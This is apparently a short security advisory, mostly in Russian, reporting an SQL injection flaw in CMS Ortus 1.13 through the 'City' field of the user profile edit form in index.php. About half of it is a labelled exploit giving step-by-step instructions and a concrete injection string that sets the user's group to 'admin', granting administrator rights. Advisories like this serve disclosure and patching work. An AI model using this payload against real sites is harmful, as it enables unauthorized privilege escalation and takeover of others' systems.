Программа: CMS Ortus 1.13

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных сценарием index.php. Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.

Эксплоит:

SQL Injection Vulnerability in POST Form:

http://www.site.com/index.php?mod=users_edit_pub

"City" field: [SQL Injection]

EXAMPLE:
1. You need to register first
   http://www.site.com/index.php?mod=users_add
2. Authentication
   http://www.site.com/index.php?mod=auth
3. Edit user profile next
   http://www.site.com/index.php?mod=users_edit_pub
4. Exploit "City" field (receive admin rights)
   MyCity', `group`='admin
5. Login to admin area
   http://www.site.com/auth.php



Оставить мнение